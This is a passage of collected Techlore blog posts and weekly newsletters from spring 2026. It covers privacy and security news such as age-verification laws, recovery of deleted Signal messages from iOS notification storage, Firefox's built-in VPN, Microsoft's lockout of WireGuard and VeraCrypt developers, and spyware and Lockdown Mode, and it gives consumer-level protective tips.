verification. We've been doing coverage for this problem and even signed an open letter asking Google to reverse its course: --- **How to explain this to someone who doesn't follow tech** This was my favorite part of the conversation. A [Techlorian](https://techlore.tech/support/#/portal/signup) asked: how do you convince people who don't follow tech that this is a real threat—especially when both major parties in your country support it? Jithendra's answer: **use analogies.** > **Jithendra:** "Would you ban your kids from going to a train station just because there is a chance to score some drugs? That takes away many things." Blanket bans in the name of protection remove more than the thing you're protecting against. That's a frame almost anyone can understand. --- ## **My takeaways** I learned a lot myself from this interview and want to make sure our content going forward considers these things: **1\. Read the law before reacting.** The word "age verification" in a headline is not enough information. Self-declaration and biometric ID checks are not the same threat level, but still need to be covered. I'll be doing a better job going forward of still covering *all* of them, but explaining the *nuance* of what each technique entails, and prioritizing energy towards the more harmful ones. **2\. Reactionary moves in the free software community can backfire.** After hearing Jithendra's arguments, I believe banning users by region to "protect" software freedom is self-defeating. There are better ways to engage, including directly with lawmakers. We don't need to undermine the values of free software to fight back again policies we disagree with. This conversation is a starting point, not a conclusion—I'm sure my views on this will evolve. The dialogue should keep going, and I'm grateful to Jithendra for helping sharpen how we think about it. If you have other guests you feel could add insight into our understanding of age verification, please send them my way so we can continue unpacking this! If you want to go deeper, check out the [Free Software Foundation Europe's ](https://fsfe.org/index.en.html)work and get involved with the organizations pushing back on these laws in ways that actually protect everyone—including kids. **I highly recommend listening/watching the full discussion with Jithendra for yourself, it's a good one with many other important topics across the hour:** 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ## Episode Sources • Free Software Foundation Europe: • FSFE — Youth Hacking for Freedom: • Software Freedom Conservancy: • Keep Android Open: ### How the FBI Read Signal Messages Without Breaking Signal | April 14, 2026 URL: https://techlore.tech/how-the-fbi-read-signal-messages-without-breaking-signal-april-14-2026/ Last updated: 2026-04-28T04:39:43.000Z # On Our Radar 🎯 [**The FBI Found a Suspect's Signal Messages in a Place Signal Can't Touch**](https://www.404media.co/fbi-extracts-suspects-deleted-signal-messages-saved-in-iphone-notification-database-2/) **Update: Apple has** [**fixed this issue**](https://techlore.tech/your-deleted-signal-messages-were-never-really-gone-but-apples-latest-update-fixed-that-april-27/) **in the latest version of iOS.** The FBI successfully extracted deleted Signal messages from a suspect's iPhone. The good news is that Signal wasn't compromised. In fact, there was no attack against Signal itself. What the FBI accessed was something almost no one thinks about: *The iOS notification database.* **Here's how it works:** When Signal sends you a message, iOS processes a notification. If previews are enabled, that content gets stored in a local notification database. So when investigators had physical access to the device, they were able to access previous incoming messages that appeared through Signal notifications—no need to break encryption. In fact, Signal had already been removed from the device completely! Fortunately, the fix here is straightforward, and it's something we've recommended before: disable message content in notification previews. On iOS, go to *Settings → Notifications → Show Previews → Never.* This prevents the notification database from storing actual message content. Similarly, Signal[ has notification preview settings](https://support.signal.org/hc/en-us/articles/360043273491-In-App-Notification-Options) if you want to handle it within the Signal ecosystem. It's also important to acknowledge these concerns expand beyond Signal on iOS: - Any application with message previews are victim to this same attack on iOS. - Android's notification system also stores message content in local databases. While it hasn't been demonstrated yet in course cases, the underlying architecture is similar enough that it's safe to assume the attack can be replicated on Android. - Finally, both mobile operating systems process notification content through Apple & Google servers, which can be [handed over](https://www.404media.co/apple-gave-governments-data-on-thousands-of-push-notifications/) to governments. **What you can do:** My takeaway isn't that Signal failed. It's that good tools require good habits around them. Even in light of this story, I'll still be using Signal with notifications and previews **completely enabled**, as these are very high threat model concerns. But if you feel this attack could jeopardize your safety, some more options to explore: - Disable notification previews for your messaging app(s). - Apple's [Lockdown Mode](https://www.youtube.com/watch?v=ENuGWhz10UY) & Google's Advanced Protection Program are powerful tools to consider for endpoint security. - Finally, visit our Signal hardening guide which covers maximum privacy and security configurations for Signal: --- # Bits & Bytes 🤖 [**\~ France Is Ditching Windows for Linux**](https://techcrunch.com/2026/04/10/france-to-ditch-windows-for-linux-to-reduce-reliance-on-us-tech/)**!** France announced plans to migrate government systems away from Windows toward Linux, explicitly citing a desire to reduce reliance on US tech infrastructure. **Our take:** I think it's wonderful to see more people around the world reclaim their digital freedom and escape the gatekeepers controlling the digital landscape. If you've been with us a while, this is the kind of win we love because it doesn't make mainstream news the way it should. [**\~ WireGuard's Developer Can't Ship Updates...Because of Microsoft**](https://techcrunch.com/2026/04/08/wireguard-vpn-developer-cant-ship-software-updates-after-microsoft-locks-account/) Speaking of gatekeepers...the developer behind WireGuard, the open-source VPN protocol, found themselves unable to push software updates because Microsoft locked their account. No breach, no policy violation explained, just a locked account creating a hard stop on critical infrastructure updates. The worst part is this also impacted [Veracrypt](https://techcrunch.com/2026/04/08/veracrypt-encryption-software-windows-microsoft-lock-boot-issues/) and Windscribe VPN. **Our take:** It's an argument for decentralized distribution that writes itself. We did [far more coverage for this in dedicated content](https://techlore.tech/microsofts-silent-lockout-why-wireguard-veracrypt-windscribe-can-no-longer-update-windows-users/) with full takes 😄 [**\~ Wisconsin Rejects Age Verification Bill**](https://gizmodo.com/wisconsin-remains-a-gooning-sanctuary-state-after-governor-rejects-age-verification-bill-2000742910)**!** Wisconsin's governor rejected a bill that would have required age verification! Age verification mandates sound protective on the surface, but the implementations consistently require collecting sensitive identity data from every user, including adults, with significant privacy and democratic implications. **Our take:** A huge win! Not every state is moving in the same direction, and the pushback matters. We will continue tracking these updates as they come, and we even covered this story when it broke: --- # This Week on Techlore 📺 Big week with lots of new faces, so I want to welcome anybody who recently joined our fight 🙏 I did some reactions to a commentary piece involving Meta's AI glasses and the creepy implications in public spaces: [Why Meta’s Smart Glasses Are Called “Pervert Glasses” And Why That Should Scare YouI came across a solid piece by a journalist, not a privacy advocate, not a tech skeptic, just a regular person who decided to spend a day wearing Meta’s Ray-Ban smart glasses. After using them, she reported back that these glasses didn’t just make her feel like a creep, they![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/v4.png)](https://techlore.tech/why-metas-smart-glasses-are-called-pervert-glasses-and-why-that-should-scare-you/) I did deeper coverage on Microsoft's ban of privacy-first developers and what prompted these problems, as well as the lack of response from Microsoft: [Microsoft’s Silent Lockout: Why WireGuard, VeraCrypt & Windscribe Can No Longer Update Windows UsersIn more news not on my 2026 bingo card...Microsoft silently suspended the developer accounts for WireGuard, VeraCrypt, and Windscribe—three of the most important open source security tools that are consistently recommended to our audience. and none of these developers were notified. Not an email, not a warning, nothing.![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/thumbnailmicrosoftv2.png)](https://techlore.tech/microsofts-silent-lockout-why-wireguard-veracrypt-windscribe-can-no-longer-update-windows-users/) Last week's Surveillance Report featured VPNs exposing you to more spying, North Korea's open source hijack, Android malware hitting 2.3 million device via Google Play, and many other critical stories: [VPNs Could Expose You to NSA Spying, North Korea’s Open-Source Hijack, Android Malware Hits 2.3 Million Devices via Google Play, and the EU Ending Chat ControlTechlore Surveillance Report: Weekly News for Your Digital Freedom![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/v3.png)](https://techlore.tech/vpns-could-expose-you-to-nsa-spying-north-koreas-open-source-hijack-android-malware-hits-2-3-million-devices-via-google-play-and-the-eu-ending-chat-control/) We invited Organic Maps on to Techlore Talks to discuss the privacy considerations of Apple & Google maps and what a true alternative can look like: [How Organic Maps Built an Open Source, Offline-First Maps App That Doesn’t Track YouTechlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260411-ORGANIC-MAPS-INTERVIEW-thumbnail-v1.jpg)](https://techlore.tech/how-organic-maps-built-an-open-source-offline-first-maps-app-that-doesnt-track-you/) And finally, I shared my first reactions to Firefox's new, 50GB free VPN, now live in the Firefox browser: [Firefox’s Free Built-In VPN: First Impressions, Live Tests, and What You’re Actually GettingThis one I didn’t see coming...Mozilla just shipped a free VPN built directly into Firefox. No app, no subscription, just 50 gigabytes a month of IP protection baked into the browser right out of the box. The setup is straightforward. It requires a Mozilla account, which I assume is![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/size/w1200/2026/04/v6.png)](https://techlore.tech/firefox-free-built-in-vpn-first-impressions-live-tests-and-what-youre-actually-getting/) --- # Action Item ✅ Audit your endpoint security this week. Open your messaging apps one by one...Signal, WhatsApp, iMessage, whatever you use...and **check your privacy & security settings.** A quick five-minute audit goes further than most people expect. I'll see you all in the next Digital Rights Digest 🫡 ### Firefox's Free Built-In VPN: First Impressions, Live Tests, and What You're Actually Getting URL: https://techlore.tech/firefox-free-built-in-vpn-first-impressions-live-tests-and-what-youre-actually-getting/ Last updated: 2026-04-13T19:20:57.000Z This one I didn't see coming...Mozilla [just shipped a free VPN](https://blog.mozilla.org/en/firefox/built-in-vpn/) built directly into Firefox. No app, no subscription, just 50 gigabytes a month of IP protection baked into the browser right out of the box. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image.png) The setup is straightforward. It requires a Mozilla account, which I assume is required to prevent abuse. Once you're signed in, there's a toggle right in the toolbar. Flip it on and Firefox routes your traffic through a secure proxy, masking your IP address. I tested it live on IPLeak.net and confirmed the IP does change. I also ran a Mullvad check since a lot of people, myself included, were wondering whether this was just running on Mullvad's infrastructure behind the scenes like the paid [Mozilla VPN ](https://www.mozilla.org/en-US/products/vpn/)does. It's not. So I can confirm it's completely different infrastructure. One thing I like is the per-site exception feature. If your bank blocks VPN traffic or another site is giving you problems, you can just add that site to an exceptions list and toggle it off for that domain only. That's a big benefit of having VPN inside your browser versus system-wide. It's not perfect. Obviously bandwidth is limited. But what I don't love is the lack of server transparency. There's very little visibility into what server you're connected to, no ability to switch locations, and I shouldn't have to pull up IPLeak.net to find out I'm on a California-based IP. I think that should be built in. But it is in beta so maybe that's something they're working on! **My overall take:** I think what Firefox is trying to do here is important. They're trying to bump the baseline level of protection for a standard user who might just install Firefox, doesn't know anything about privacy, and is going to be a bit better protected in the process. This is something already embraced by [Brave](https://brave.com/firewall-vpn/), [Safari](https://support.apple.com/en-us/102602), [Vivaldi](https://vivaldi.com/protonvpn/), and [Opera](https://www.opera.com/features/free-vpn)—so it keeps Firefox competitive. If you're a Firefox user and you're not running a VPN at all, turning this on is genuinely an improvement with absolutely no downgrade. But if you're already using a system-wide VPN, I don't see many reasons to swap. Firefox VPN isn't meant to replace a proper VPN, and I don't think Firefox themselves would even say it is. It's a starting point, and for that, it's a pretty good one. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### How Organic Maps Built an Open Source, Offline-First Maps App That Doesn't Track You URL: https://techlore.tech/how-organic-maps-built-an-open-source-offline-first-maps-app-that-doesnt-track-you/ Last updated: 2026-04-11T16:30:34.000Z Every time you open Google Maps, it knows where you are, what you searched, how long you stayed, and where you went next. Organic Maps collects none of that. In this interview, Henry sits down with Alexander Borsuk, co-founder of Organic Maps, to talk about what mainstream maps apps are collecting, how an entirely offline-first approach changes the privacy picture, and where Organic Maps is headed next, including live public transit and opt-in traffic data. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) # Episode Sources • Organic Maps: • Organic Maps GitHub: • OpenStreetMap: • OsmAnd: ### VPNs Could Expose You to NSA Spying, North Korea's Open-Source Hijack, Android Malware Hits 2.3 Million Devices via Google Play, and the EU Ending Chat Control URL: https://techlore.tech/vpns-could-expose-you-to-nsa-spying-north-koreas-open-source-hijack-android-malware-hits-2-3-million-devices-via-google-play-and-the-eu-ending-chat-control/ Last updated: 2026-04-11T15:37:58.000Z This week's highlight story is a big one...six lawmakers are pressing intelligence officials to answer whether Americans using commercial VPNs could be stripped of their constitutional protections and treated as foreign targets under Section 702 of FISA. The irony here is these same organizations have all recommended that consumers use VPNs for privacy, which may inadvertently hand the NSA legal cover to surveil your traffic as if you're a foreign national. I don't think this is any reason to ditch your VPN, but it does expose the deeper flaw in how governments are approaching digital rights. I think the real fix isn't carving out exceptions for Americans; it's recognizing that mass surveillance is wrong, regardless of whose citizens it targets. Beyond the VPN story, this was an enormous week. North Korea pulled off a weeks-long, methodically planned supply chain hijack of the widely-used Axios JavaScript library. And right as Google is pushing to lock down Android sideloading under the banner of Play Store safety, we got the story of NoVoice—Android malware distributed through 50+ Play Store apps with 2.3 million downloads, capable of surviving a factory reset. I also covered Apple's expanding device-level age verification, the EU Parliament's big vote to kill Chat Control (and Patrick Brayer's compelling five-point action plan for real child protection), and a packed Defense Bulletin with updates from VeraCrypt, Meta's child exploitation loss in court, Apple Maps ads, and more. 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [podcast app](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) ## Episode Sources **Highlight: VPN Use May Subject You to NSA Spying** - - **Story 1: North Korea's Weeks-Long Open Source Hijack** - **Story 2: Android Malware Infected 23 Million Devices via Google Play** - **Story 3: Apple Expands Device-Level Age Verification** - - - - - - - - - - **Story 4: EU Parliament Kills Chat Control** - - **The Defense Bulletin** - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ### Microsoft's Silent Lockout: Why WireGuard, VeraCrypt & Windscribe Can No Longer Update Windows Users URL: https://techlore.tech/microsofts-silent-lockout-why-wireguard-veracrypt-windscribe-can-no-longer-update-windows-users/ Last updated: 2026-04-09T04:09:58.000Z In more news not on my 2026 bingo card...Microsoft silently suspended the developer accounts for WireGuard, VeraCrypt, and Windscribe—three of the most important open source security tools that are [consistently recommended](https://essentials.techlore.tech/) to our audience. and none of these developers were notified. Not an email, not a warning, nothing. The WireGuard developer checked every inbox and every spam folder. Nothing. The immediate stakes are pretty extreme, Veracrypt users with full system encryption enabled may not be able to boot their computers after July 2026, because Microsoft is revoking the certificate authority used to sign VeraCrypt's bootloader. WireGuard is the protocol underpinning essentially every major VPN on the market and they already came forward to confirm they can't patch any vulnerabilities if they were to arise. And we can't forget the bigger conversation here...we need to ask what it means when our security tools are one bureaucratic mistake away from being cut off from users entirely. Big Tech has spent years justifying ecosystem gatekeeping as a security feature. This week, that same gatekeeping broke the actual security. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Why Meta's Smart Glasses Are Called "Pervert Glasses" And Why That Should Scare You URL: https://techlore.tech/why-metas-smart-glasses-are-called-pervert-glasses-and-why-that-should-scare-you/ Last updated: 2026-04-08T01:04:43.000Z I came across a [solid piece](https://www.theguardian.com/technology/2026/apr/01/i-wore-metas-smartglasses-for-a-month-and-it-left-me-feeling-like-a-creep) by a journalist, not a privacy advocate, not a tech skeptic, just a regular person who decided to spend a day wearing Meta's Ray-Ban smart glasses. After using them, she reported back that these glasses didn't just make her feel like a creep, they made her *think* like one. The glasses have earned the unofficial nickname "pervert glasses" in some circles, and after reading her account, it's hard to argue with her. While yes I wanted to cover her story and offer my commentary, what I really wanted to do was zoom out and address *who* is receiving this footage. When someone films you through Meta glasses, they aren't just filming for themselves. They're filming for Zuckerberg. For Meta's servers. For Meta's AI training pipelines—something the company itself has admitted they're exploring. You never agreed to that. You never had the option to opt out. You don't even know it's happening. And this is where I think the conversation has to get bigger. Meta doesn't have a real business model outside of exploiting user data. Their services are free because *you* are the product. Your behavior, your attention, your relationships, all sold to advertisers. The Metaverse failed. Now smart glasses are the next pitch. But the underlying motive is the same: more ways to turn human experience into ad inventory. All without real consent. If this resonates, I'd love to hear your perspective on YouTube or PeerTube. Enjoy the video. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### VPNs, NSA Spying, and the Surveillance Double Standard Nobody Wants to Address | April 1-7 URL: https://techlore.tech/vpns-nsa-spying-and-the-surveillance-double-standard-nobody-wants-to-address/ Last updated: 2026-04-12T02:02:01.000Z ## On Our Radar 🎯 [**The Government Told You to Use a VPN. They Also Admit It May Strip Your Constitutional Rights.**](https://www.wired.com/story/using-a-vpn-may-subject-you-to-nsa-spying/) Four senators and two representatives sent a letter to Director of National Intelligence asking her to publicly disclose whether Americans using commercial VPNs are being treated as foreigners under US surveillance law. The idea goes like this: if a VPN routes traffic through another country, the NSA may treat that traffic as foreign, classify the user as a non-US person, and strip the constitutional protections against warrantless surveillance they're entitled to as Americans. [(which we already feel is questionable at best)](https://techcrunch.com/2026/03/18/fbi-is-buying-location-data-to-track-us-citizens-kash-patel-wyden/). This all happens under Section 702 of FISA, which enables the NSA to warrantlessly collect communications of people abroad. The lawmakers aren't claiming this VPN scenario has definitively happened—that info is classified. But the fact they're asking at all is a pretty obvious signal it's something we should watch out for. **What you can do:** Big story...I have some takeaways: 1. No individual action eliminates this risk, it's a structural legal issue. What you can do is contact your representatives and tell them Section 702 reform matters to you. Organizations like [EFF](http://eff.org/) are actively campaigning against this. 2. This story exposes a deeper flaw in how governments approach digital rights: the belief that we can draw jurisdictional lines around data that flows globally by design. But the real fix isn't a carve-out restoring American rights—it's recognizing that mass surveillance is wrong regardless of whose citizens it targets. The TikTok saga spoke to this clearly: Congress moved to ban the app specifically because Chinese intelligence could access American user data. TikTok was then effectively transferred to US-aligned ownership, but the surveillance apparatus underneath it didn't change at all. You're being equally exploited with no more rights. 3. This is not a reason to abandon your VPN. Even if the NSA managed to collect your traffic, you would not be worse off than leaving it exposed to your ISP to log and sell freely. If you're exploring VPNs, our[ VPN Finder](https://vpn.techlore.tech/) is a good place to start. Alternatively, our [SPA Essentials ](https://essentials.techlore.tech/)have more trustless tools like Tor. 4. Ultimately, the more people using privacy tools, the less targeted one person will be for using them. I strongly believe that using privacy tools is part of how we advocate for *others* who may need the tools even more than ourselves! --- ## Bits & Bytes 🤖 [**\~ LinkedIn Is Secretly Scanning Your Browser for 6,000+ Extensions**](https://www.bleepingcomputer.com/news/security/linkedin-secretely-scans-for-6-000-plus-chrome-extensions-collects-data/) Every time you open LinkedIn in a Chromium-based browser, a hidden JavaScript routine silently probes your browser for more than 6,000 installed extensions, collecting sensitive hardware and software characteristics, encrypting the resulting fingerprint, and attaching it to every request you make. The practice, called "BrowserGate" is undisclosed in LinkedIn's privacy policy. The scan could expose whether you're quietly looking for work on the very platform where your current employer can see your profile, alongside extensions tied to religious practices, health conditions, and political orientation. **Our take:** LinkedIn's defense is that it's protecting against scrapers and terms violations. **(ha!)** That sort of falls apart when the scan extends to religious tools, health apps, political extensions, and hundreds of competitor products with no connection to scraping. Based on my research, Firefox and Safari users *should* *not* be affected by the extension scanning specifically as the script includes a `isUserAgentChrome()` gate that only fires on Chromium browsers. Brave's fingerprinting protection enabled can block the detection mechanism, [as confirmed](https://x.com/fanboynz/status/2039861575113388278) by one of the engineers I met at the [ad-filtering dev summit](https://techlore.tech/we-make-money-from-ads-but-heres-why-ad-blocking-matters-afds-2025-recap/). This is a reminder that [using any privacy-focused browser](https://essentials.techlore.tech/#web-browsers) is a critically-important step of any digital rights journey! LinkedIn just got caught, but it's happening on countless websites. What I haven't been able to confirm is if extensions-alone could have prevented this regardless of browser *(Ex. Using uBlock Origin in Chrome)* [**\~ 2.3 Million Android Devices Were Infected Through Google Play**](https://www.bleepingcomputer.com/news/security/novoice-android-malware-on-google-play-infected-23-million-devices/) A rootkit malware called NoVoice was hidden in over 50 apps on the Google Play Store, downloaded a combined 2.3 million times. The apps looked harmless (cleaners, games, gallery tools), required no suspicious permissions, and worked exactly as advertised. Behind the scenes, they exploited old Android vulnerabilities to gain root access, replaced core system libraries, and established persistence so deep that a factory reset won't remove the infection. Google has removed the apps and says devices with security patches from May 2021 or later are protected from the specific exploits observed. **Our take:** The irony here happens when we look at Google's justification for [restricting sideloading on Android](https://keepandroidopen.org/), the core argument being that the Play Store is a safer, curated environment. Keeping your Android device updated is the best individual defense here, but it's important to be honest about what the Play Store does and doesn't guarantee. We just wish Google would be honest as they propose these very reasons as justifications for attacking the openness of Android. [**\~ A Lawsuit Says Perplexity's "Incognito Mode" Is a Sham**](https://arstechnica.com/tech-policy/2026/04/perplexitys-incognito-mode-is-a-sham-lawsuit-says/) A proposed class-action lawsuit alleges Perplexity AI has been sharing full conversation transcripts with Meta and Google since 2022, including when users had "Incognito Mode" enabled. The complaint describes embedded trackers (Meta Pixel, Google Ads, Conversions API) operating server-side, meaning no browser privacy setting can block them. Sensitive searches about health, finances, and legal matters were allegedly transmitted with personally identifiable information attached. The lawsuit covers users from December 2022 through early 2026\. As of right now, Perplexity disputes the allegations. **Our take:** Server-side tracking is specifically designed to bypass the tools privacy-conscious users rely on. Whether this lawsuit succeeds or not, it's a reminder that "private" labels on AI tools deserve the same skepticism you'd apply to a browser's incognito tab, where they rarely mean what most people assume. We are currently in the process of updating our [SPA Essentials](https://essentials.techlore.tech/) to include AI recommendations to offer alternatives going forward. --- ## This Week on Techlore 📺 We spent this week building something we've been thinking about for a while: a unified **SPA (Security, Privacy, Anonymity)** ecosystem for our tools. - [**SPA Essentials**](https://essentials.techlore.tech/) is your starting point—fast, actionable starter-pack advice. *(It's what used to be our privacy resources)* - [**SPA Quiz**](https://quiz.techlore.tech/)is how you measure your progress over time in a fun, interactive manner. - **SPA Wiki** is coming soon: a second brain for everything digital rights, think Wikipedia but for everything we discuss! It will be a living, breathing resource with top-tier information. This is inspired from my personal attempts of [starting something semi-similar](https://github.com/henry-fisher/privacyresources) to this to centralize quality information in a single place. - [VPN Finder](https://vpn.techlore.tech/) also got a proper name..."VPN Comparison Chart" wasn't exactly inspiring. It lives outside SPA but deserved better branding regardless. Individual rewrites of each tool are coming in the next few weeks. If you have ideas for what else should live in the ecosystem, we'd love to hear them. Finally: [**Surveillance Report and Techlore Talks have a new hosting provider.**](https://techlore.tech/podcasts/) The redirect is clean, so no action required, but we'll be publishing updated RSS URLs shortly. If you hit any issues, swap to the new URL and you're good. But again, should happen automatically! --- ## Action Item ✅ Section 702 of FISA, the surveillance law at the heart of this week's VPN story is approaching reauthorization. This is one of the most direct levers available for pushing back on mass surveillance, and it only gets renewed because most people never weigh in. Take five minutes this week to contact your representatives and tell them Section 702 reform matters to you. The EFF is [doing coverage ](https://www.eff.org/deeplinks/2026/03/congress-dropping-ball-clean-extension-fisa)we all should watch carefully. Contact your reps & support the EFF! #### On this page ### The Week Big Tech Got Sued, Hacked, and Verified | March 22-31 URL: https://techlore.tech/the-week-big-tech-got-sued-hacked-and-verified-march-22-31/ Last updated: 2026-04-01T01:56:48.000Z ## On Our Radar 🎯 [**The Dam Breaks: First Jury Holds Meta and Google Liable for Social Media Addiction**](https://www.npr.org/2026/03/25/nx-s1-5746125/meta-youtube-social-media-trial-verdict) For the first time, a jury found Meta and Google negligent in the design and operation of their social media platforms, determining that Instagram and YouTube were a "substantial factor" in causing serious mental health harm to children. Some legal context: the case was designed as a "bellwether"—a verdict meant to set the framework for over 2k similar lawsuits pending across the country against big tech companies. For context on some of the evidence discussed, one of the internal Meta documents introduced at trial read: *"If we wanna win big with teens, we must bring them in as tweens."* Another: *"Oh my gosh, IG is a drug… we're basically pushers."* The legal theory here matters for digital rights: they deliberately avoided arguing about *content,* and instead argued about *product design*. Infinite scroll. Push notifications. Algorithmic amplification optimized for engagement. These are engineering choices made by human beings at companies that knew the risks. The jury agreed those choices constitute negligence. If that theory holds through appeals, this could mean very big things for the future of legislation against these companies and what kind of incentives will exist on the platforms. Which can have impacts on privacy, surveillance, and mental sovereignty. Both Meta and Google are expected to appeal, and neither verdict is the last word. So we'll continue following closely! **What you can do:** Check out [Screen Time](https://support.apple.com/en-us/screen-time) and [Family Link](https://families.google/familylink/) settings on your devices. They don't fix structural issues, but can help develop the tools for children and other loved ones (including yourself!) to develop better relationships with technology. Additionally, I'm a [big fan of tools like NextDNS](https://youtu.be/WUG57ynLb8I) which include quite powerful controls that can block categories of content (ex. Social Media, porn, etc.) and even do the blocking on a set schedule on *all* devices. No matter what tools you find, the goal is to improve your relationship with your devices so that you are in control, so I encourage you to experiment to find what works best for you. --- ## Bits & Bytes 🤖 [**\~ DarkSword: The iOS Exploit Now Anyone Can Use**](https://www.wired.com/story/apple-will-push-out-rare-backported-patches-to-protect-ios-18-users-from-darksword-hacking-tool/) A sophisticated iOS hacking toolkit called DarkSword was leaked. Researchers called it trivial to deploy: "no iOS expertise required," & works out of the box. It targets iPhones running iOS 18.4 through 18.7, can steal messages, contacts, passwords, photos, and cryptocurrency wallets in minutes with no user interaction required. Apple has patched the underlying vulnerabilities in iOS 26.3+ and iOS 18.7.3+, and is issuing rare backported patches for older devices. **Our take:** The obvious takeaway is to update your devices and consider lockdown mode for higher threat models. But the other layer to this story is that this was originally a state-level weapon that is now basic commodity malware. These organizations (and governments!) chose to keep these attacks secret for their own gain, rather than notify Apple of the concerns before it got out of hand. It's important to remember many of these organizations directly benefit from the potential to exploit millions of people, and we hope to see greater consequences for this industry. [**\~ Apple Lockdown Mode: Still an Unbroken Record**](https://techcrunch.com/2026/03/27/apple-says-no-one-using-lockdown-mode-has-been-hacked-with-spyware/) Years after Apple launched Lockdown Mode, the company confirmed this week it has no record of a single device with Lockdown Mode enabled being successfully compromised by mercenary spyware. Amnesty International's security lab and Citizen Lab independently corroborated the claim. Researchers found spyware like Pegasus and Predator was even coded to *abort* their infection attempts upon detecting Lockdown Mode, apparently to avoid leaving detectable traces. **Our take:** Lockdown Mode isn't for everyone, [it restricts usability in some key ways](https://www.youtube.com/watch?v=ENuGWhz10UY), but it's an incredible tool for journalists, activists, lawyers, and anyone at elevated risk. The reality is it's one of the most powerful security features ever released, accessible with just a single toggle in the settings. Anyone can toggle it on and easily turn it off just as easily if it doesn't work for them. [**\~ Apple Rolls Out Device-Level Age Verification in the UK**](https://gizmodo.com/apple-requires-device-level-age-verification-in-the-uk-now-could-the-us-be-next-2000738481) iOS 26.4 introduced a new requirement for UK users: verify you're 18+ (via credit card scan or government ID) or have features restricted and monitoring enabled on AirDrop, FaceTime, and Messages. Apple is doing this proactively to avoid future problems with the UK's Online Safety Act. Meanwhile, Gizmodo asked the obvious question: could the US be next? Mark Zuckerberg has publicly endorsed device-level age checks, calling it "a lot clearer" than every app doing it separately. [(And is also spending $2 billion lobbying to try and pass device-level checks to avoid the verification needing to impact Meta)](https://www.yahoo.com/news/articles/reddit-user-uncovers-behind-meta-154717384.html) **Our take:** This is a big story to watch. We'll be doing a lot more dedicated coverage for this in the near future, so stay tuned! [**\~ Proton Launches Encrypted Video Conferencing**](https://proton.me/business/blog/introducing-proton-meet) Proton launched Proton Meet today, a fully end-to-end encrypted video conferencing platform using the Messaging Layer Security (MLS) protocol. No account required to join calls, no logs kept, available on web and all major platforms. Simultaneous with the launch, Proton rebranded its suite of business tools as Proton Workspace, positioning itself as a direct alternative to Google Workspace and Microsoft 365 for orgs. **Our take:** While not everyone may want a suite, and may prefer to individually select services in their tech stack, I think it's of *critical* importance that we have an easy, privacy-respecting alternative to the big tech ecosystems people are familiar with. This was a big missing piece to a suite, so it's great to see this happen! We got to beta test Proton Meet a few months ago in some meetings we had with Proton, and we can confirm it works quite nicely! --- ## This Week on Techlore 📺 We published SR258 this week, which was a BIG episode given we had to skip a couple weeks due to travel + sickness. It's great to be back though and wonderful to see you all get active. [Coruna and DarkSword iOS Exploits Explained: What iPhone Users Need to Do Right NowTechlore Surveillance Report: Weekly News for Your Digital Freedom![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-48.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/_Thumbnail-Surveillance-Report-4.png)](https://techlore.tech/coruna-and-darksword-ios-exploits-explained-what-iphone-users-need-to-do-right-now/) Finally, we sat down with Cape Cellular, an interview you don't want to miss if you've been thinking about your mobile carrier from a privacy angle. It's quite technical and dives into the full cellular infrastructure behind the scenes and what individuals can do to protect themselves. [Cell Phone Privacy: Triangulation, SIM Swaps, IMSI Catchers, & More (Cape Interview)Techlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and 